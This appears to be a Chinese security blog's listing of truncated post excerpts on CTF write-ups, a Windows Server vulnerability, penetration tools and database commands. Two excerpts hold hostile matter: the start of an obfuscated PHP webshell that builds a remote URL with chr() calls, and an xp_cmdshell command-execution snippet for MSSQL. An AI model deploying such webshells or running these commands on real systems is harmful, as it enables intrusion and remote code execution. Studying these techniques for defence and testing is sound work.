摘要:
题目 链接: https://pan.baidu.com/s/1Ok1k3oxjIIydiUvYAuKydg 提取码: mhm9 复制这段内容后打开百度网盘手机App,操作更方便哦 解题思路 1、附件下载是一个base.exe,运行如下图: 2、扔到IDA,F5查看伪代码如下 (1)对主函数进行分析 阅读全文
摘要:
影响范围 Windows Server, version 20H2 (Server Core Installation) Windows Server, version 2004 (Server Core installation) Windows Server 2022 (Server Core 阅读全文
摘要:
<?php $password='lshh';$b="chr"; session_start(); if(empty($_SESSION['PhpCode'])){ $d=$b(104).$b(116).$b(116).$b(112).$b(58).$b(47).$b(47).$b(57).$b(5 阅读全文
摘要:
关于Swagger-UI下的渗透实战 阅读全文
摘要:
题目 题目名称:键盘流量 题目类型:MISC 解题思路 题目下载解压发现是55.pcapng、miwen.txt两个文件 miwen.txt miwen.txt内容为base64编码假flag,文件大小与实际内容不符,发现txt隐写了零宽字符 如何发现零宽字符,vim打开文件,如下图: python 阅读全文
摘要:
工具介绍 随着WEB前端打包工具的流行,您在日常渗透测试、安全服务中是否遇到越来越多以Webpack打包器为代表的网站?这类打包器会将整站的API和API参数打包在一起供Web集中调用,这也便于我们快速发现网站的功能和API清单,但往往这些打包器所生成的JS文件数量异常之多并且总JS代码量异常庞大( 阅读全文
摘要:
工具介绍 FireKylin中文名称叫:火麒麟,其实跟某氪金游戏火麒麟并没有关系,作为国产的网络安全工具名称取自中国神兽:麒麟。寓意是希望能够为守护中国网络安全作出一份贡献。 其功能是收集操作系统各项痕迹,支持Windows和Linux痕迹收集。 其作用是为分析研判安全事件提供操作系统数据。 其目的 阅读全文
摘要:
postgreSQL简介 postgreSQL数据库介绍 数据库端口5432 数据库连接成功常用数据库查询命令 命令行客户端操作pg数据库常用操作 1.链接数据库 $psql -U user_name -d database_name -h serverhost 2.命令常用操作 \h #查看所有的 阅读全文
摘要:
介绍 Viper(炫彩蛇)是什么 docker 安装 Viper(炫彩蛇)是什么 渗透实战 msf代理 配置socks代理即可 持久化 阅读全文
摘要:
xp_cmdshell exec master..xp_cmdshell "命令" //修改配置,1为开启xm_cmdshell方法,0是关闭 EXEC sp_configure 'xp_cmdshell',0;RECONFIGURE; wireshark抓包数据内容如下,发现mssql交互是应用层 阅读全文